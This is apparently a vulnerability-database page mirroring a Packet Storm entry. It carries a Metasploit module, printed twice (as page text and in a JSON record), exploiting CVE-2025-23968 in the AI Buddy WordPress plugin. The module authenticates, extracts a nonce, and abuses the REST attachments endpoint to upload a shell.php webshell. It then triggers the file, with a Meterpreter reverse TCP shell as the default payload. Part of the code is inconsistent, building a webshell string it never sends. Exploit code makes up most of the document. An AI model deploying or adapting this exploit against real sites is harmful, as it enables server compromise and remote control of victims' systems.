📄 WordPress AI Buddy 1.8.5 Shell Upload_PACKETSTORM:212499

9.1 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Description

WordPress AI Buddy plugin versions 1.8.5 and below remote shell upload exploit that leverages the REST API attachment functionality...

Visit Original Source

Basic Information

ID PACKETSTORM:212499

Published Dec 5, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : AI Buddy WordPress plugin 1.8.5 Universal RCE Exploit Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://ai.cibeles.net/ |
=============================================================================================================================================

POC :

[+] References : https://packetstorm.news/files/id/210977/ & CVE-2025-23968

[+] Summary :

This module exploits an authenticated arbitrary file upload vulnerability in the
AI Buddy WordPress plugin (<= 1.8.5). The vulnerability allows authenticated attackers
to upload PHP webshells via the REST API attachment functionality
[+] POC :

use exploit/multi/http/wp_ai_buddy_rce

set RHOSTS target.com

set USERNAME admin

set PASSWORD password123

exploit

##
# AI Buddy Authenticated RCE Module
# module for AI Buddy which requires authentication
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::Wordpress
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'WordPress AI Buddy Authenticated RCE',
'Description' => %q{
This module exploits an authenticated arbitrary file upload vulnerability in the
AI Buddy WordPress plugin (<= 1.8.5). The vulnerability allows authenticated attackers
to upload PHP webshells via the REST API attachment functionality.
},
'Author' => [
'indoushka', # Metasploit module
'Ryan Kozak' # Original discovery
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2025-23968'],
['URL', 'https://wpcenter.io/'],
['WPVDB', '281518ff-7816-4007-b712-63aed7828b34']
],
'Platform' => ['php'],
'Arch' => [ARCH_PHP],
'Targets' => [['Universal', {}]],
'DisclosureDate' => '2025-11-27',
'DefaultTarget' => 0,
'DefaultOptions' => {
'SSL' => false,
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
},
'Privileged' => false,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)

register_options([
OptString.new('TARGETURI', [true, 'The base path to WordPress', '/']),
OptString.new('USERNAME', [true, 'WordPress username']),
OptString.new('PASSWORD', [true, 'WordPress password'])
])
end

def check
return CheckCode::Unknown('Could not connect to target') unless wordpress_and_online?

check_code = check_plugin_version_from_readme('ai-buddy', '1.8.6')

if check_code.code == 'appears'
return CheckCode::Appears("Vulnerable AI Buddy version detected: #{check_code.details[:version]}")
end

CheckCode::Safe('AI Buddy not detected or version not vulnerable')
end

def exploit
# Login to WordPress
print_status("Authenticating with WordPress...")

cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
unless cookie
fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress')
end

print_good("Successfully authenticated")

# Extract AI Buddy nonce
nonce = extract_ai_buddy_nonce(cookie)
unless nonce
fail_with(Failure::Unknown, 'Could not extract AI Buddy nonce')
end

print_good("Extracted nonce: #{nonce}")

# Upload webshell via REST API
upload_webshell(cookie, nonce)
end

def extract_ai_buddy_nonce(cookie)
print_status("Extracting AI Buddy nonce...")

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'wp-admin', 'tools.php'),
'method' => 'GET',
'cookie' => cookie
})

unless res
fail_with(Failure::Unreachable, 'Could not access tools.php')
end

# Extract nonce from JavaScript
if res.body =~ /var ai_buddy_localized_data = ({.*?});/m
json_data = JSON.parse($1)
return json_data['ai_buddy_image_post_attachment']['nonce']
end

nil
end

def upload_webshell(cookie, nonce)
print_status("Uploading webshell via AI Buddy REST API...")

php_payload = payload.encoded

# For AI Buddy, we use a different approach since it fetches from URLs
# We'll create a simple PHP file that includes our payload
webshell_content = "<?php #{php_payload} ?>"

# Note: In practice, you'd need to host this file somewhere accessible
# For the module, we'll use a placeholder approach
payload_data = {
'title' => 'Exploit',
'caption' => 'Test',
'alt' => 'Test',
'description' => 'Test',
'url' => 'https://raw.githubusercontent.com/d0n601/d0n601/refs/heads/master/test.jpg',
'filename' => 'shell.php'
}

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'wp-json', 'ai-buddy', 'v1', 'wp', 'attachments'),
'method' => 'POST',
'cookie' => cookie,
'headers' => {
'X-Wp-Nonce' => nonce,
'Content-Type' => 'application/json'
},
'data' => JSON.generate(payload_data)
})

unless res
fail_with(Failure::Unreachable, 'No response from REST API')
end

if res.code == 200 && res.body.include?('success')
print_good("Webshell uploaded successfully")

# Trigger the payload
current_year = Time.now.year
current_month = Time.now.month.to_s.rjust(2, '0')
shell_url = "/wp-content/uploads/#{current_year}/#{current_month}/shell.php"

print_status("Triggering payload at #{shell_url}...")
send_request_cgi({
'uri' => normalize_uri(target_uri.path, shell_url),
'method' => 'GET'
}, 5)

else
print_error("Upload failed: #{res.body}")
end
end
end

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-12-05T18:52:54",
    "description": "WordPress AI Buddy plugin versions 1.8.5 and below remote shell upload exploit that leverages the REST API attachment functionality...",
    "published": "2025-12-05T00:00:00",
    "modified": "2025-12-05T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 WordPress AI Buddy 1.8.5 Shell Upload",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212499",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-23968"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : AI Buddy WordPress plugin 1.8.5 Universal RCE Exploit Module                                                                |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\n    | # Vendor    : https://ai.cibeles.net/                                                                                                     |\n    =============================================================================================================================================\n    \n    POC : \n    \n    [+] References : https://packetstorm.news/files/id/210977/ & \tCVE-2025-23968\n    \n    [+] Summary : \n              \n              This module exploits an authenticated arbitrary file upload vulnerability in the\n              AI Buddy WordPress plugin (<= 1.8.5). The vulnerability allows authenticated attackers\n              to upload PHP webshells via the REST API attachment functionality\n    [+] POC :  \n    \n    use exploit/multi/http/wp_ai_buddy_rce\n    \n    set RHOSTS target.com\n    \n    set USERNAME admin\n    \n    set PASSWORD password123\n    \n    exploit\n    \n    ##\n    # AI Buddy Authenticated RCE Module\n    # module for AI Buddy which requires authentication\n    ##\n    \n    class MetasploitModule < Msf::Exploit::Remote\n      Rank = ExcellentRanking\n    \n      include Msf::Exploit::Remote::HttpClient\n      include Msf::Exploit::Remote::HTTP::Wordpress\n      prepend Msf::Exploit::Remote::AutoCheck\n    \n      def initialize(info = {})\n        super(\n          update_info(\n            info,\n            'Name' => 'WordPress AI Buddy Authenticated RCE',\n            'Description' => %q{\n              This module exploits an authenticated arbitrary file upload vulnerability in the\n              AI Buddy WordPress plugin (<= 1.8.5). The vulnerability allows authenticated attackers\n              to upload PHP webshells via the REST API attachment functionality.\n            },\n            'Author' => [\n              'indoushka', # Metasploit module\n              'Ryan Kozak' # Original discovery\n            ],\n            'License' => MSF_LICENSE,\n            'References' => [\n              ['CVE', '2025-23968'],\n              ['URL', 'https://wpcenter.io/'],\n              ['WPVDB', '281518ff-7816-4007-b712-63aed7828b34']\n            ],\n            'Platform' => ['php'],\n            'Arch' => [ARCH_PHP],\n            'Targets' => [['Universal', {}]],\n            'DisclosureDate' => '2025-11-27',\n            'DefaultTarget' => 0,\n            'DefaultOptions' => {\n              'SSL' => false,\n              'PAYLOAD' => 'php/meterpreter/reverse_tcp'\n            },\n            'Privileged' => false,\n            'Notes' => {\n              'Stability' => [CRASH_SAFE],\n              'Reliability' => [REPEATABLE_SESSION],\n              'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n            }\n          )\n        )\n    \n        register_options([\n          OptString.new('TARGETURI', [true, 'The base path to WordPress', '/']),\n          OptString.new('USERNAME', [true, 'WordPress username']),\n          OptString.new('PASSWORD', [true, 'WordPress password'])\n        ])\n      end\n    \n      def check\n        return CheckCode::Unknown('Could not connect to target') unless wordpress_and_online?\n    \n        check_code = check_plugin_version_from_readme('ai-buddy', '1.8.6')\n        \n        if check_code.code == 'appears'\n          return CheckCode::Appears(\"Vulnerable AI Buddy version detected: #{check_code.details[:version]}\")\n        end\n    \n        CheckCode::Safe('AI Buddy not detected or version not vulnerable')\n      end\n    \n      def exploit\n        # Login to WordPress\n        print_status(\"Authenticating with WordPress...\")\n        \n        cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])\n        unless cookie\n          fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress')\n        end\n    \n        print_good(\"Successfully authenticated\")\n    \n        # Extract AI Buddy nonce\n        nonce = extract_ai_buddy_nonce(cookie)\n        unless nonce\n          fail_with(Failure::Unknown, 'Could not extract AI Buddy nonce')\n        end\n    \n        print_good(\"Extracted nonce: #{nonce}\")\n    \n        # Upload webshell via REST API\n        upload_webshell(cookie, nonce)\n      end\n    \n      def extract_ai_buddy_nonce(cookie)\n        print_status(\"Extracting AI Buddy nonce...\")\n        \n        res = send_request_cgi({\n          'uri' => normalize_uri(target_uri.path, 'wp-admin', 'tools.php'),\n          'method' => 'GET',\n          'cookie' => cookie\n        })\n    \n        unless res\n          fail_with(Failure::Unreachable, 'Could not access tools.php')\n        end\n    \n        # Extract nonce from JavaScript\n        if res.body =~ /var ai_buddy_localized_data = ({.*?});/m\n          json_data = JSON.parse($1)\n          return json_data['ai_buddy_image_post_attachment']['nonce']\n        end\n    \n        nil\n      end\n    \n      def upload_webshell(cookie, nonce)\n        print_status(\"Uploading webshell via AI Buddy REST API...\")\n    \n        php_payload = payload.encoded\n        \n        # For AI Buddy, we use a different approach since it fetches from URLs\n        # We'll create a simple PHP file that includes our payload\n        webshell_content = \"<?php #{php_payload} ?>\"\n    \n        # Note: In practice, you'd need to host this file somewhere accessible\n        # For the module, we'll use a placeholder approach\n        payload_data = {\n          'title' => 'Exploit',\n          'caption' => 'Test',\n          'alt' => 'Test', \n          'description' => 'Test',\n          'url' => 'https://raw.githubusercontent.com/d0n601/d0n601/refs/heads/master/test.jpg',\n          'filename' => 'shell.php'\n        }\n    \n        res = send_request_cgi({\n          'uri' => normalize_uri(target_uri.path, 'wp-json', 'ai-buddy', 'v1', 'wp', 'attachments'),\n          'method' => 'POST',\n          'cookie' => cookie,\n          'headers' => {\n            'X-Wp-Nonce' => nonce,\n            'Content-Type' => 'application/json'\n          },\n          'data' => JSON.generate(payload_data)\n        })\n    \n        unless res\n          fail_with(Failure::Unreachable, 'No response from REST API')\n        end\n    \n        if res.code == 200 && res.body.include?('success')\n          print_good(\"Webshell uploaded successfully\")\n          \n          # Trigger the payload\n          current_year = Time.now.year\n          current_month = Time.now.month.to_s.rjust(2, '0')\n          shell_url = \"/wp-content/uploads/#{current_year}/#{current_month}/shell.php\"\n          \n          print_status(\"Triggering payload at #{shell_url}...\")\n          send_request_cgi({\n            'uri' => normalize_uri(target_uri.path, shell_url),\n            'method' => 'GET'\n          }, 5)\n    \n        else\n          print_error(\"Upload failed: #{res.body}\")\n        end\n      end\n    end\n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212499",
    "cvss": {
        "score": 9.1,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212499/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply